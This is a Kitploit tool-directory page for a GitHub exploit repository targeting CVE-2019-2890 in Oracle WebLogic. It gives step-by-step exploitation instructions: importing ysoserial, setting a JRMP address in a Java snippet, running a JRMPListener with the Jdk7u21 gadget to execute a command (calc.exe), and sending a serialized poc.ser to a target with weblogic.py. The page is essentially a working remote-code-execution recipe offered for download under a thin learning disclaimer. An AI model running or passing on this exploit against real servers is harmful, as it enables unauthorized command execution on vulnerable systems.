Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-2890 — 0-sec.org | Kitploit
Tools/GitHubGitHub/ianxtianxt/cve-2019-2890
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

0-sec.org

View Repository
426 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Disclaimer

For learning and communication purposes only. Use for other purposes at your own risk.

Description

The relevant jar files have been imported into the project, and the exploitation method uses yso's JRMP. When learning and debugging, you can modify the exploitation method.

First, place the SerializedSystemIni.dat file from weblogic into the security folder.

Then rename yso to ysoserial.jar and import it into the lib directory.

1

Next, the IP address and port of getObject in weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Finally, remotely listen via JRMP and exploit using 7u21 command execution.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Usage: run Poc.java to generate the poc.ser serialized file, then use

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Download Tool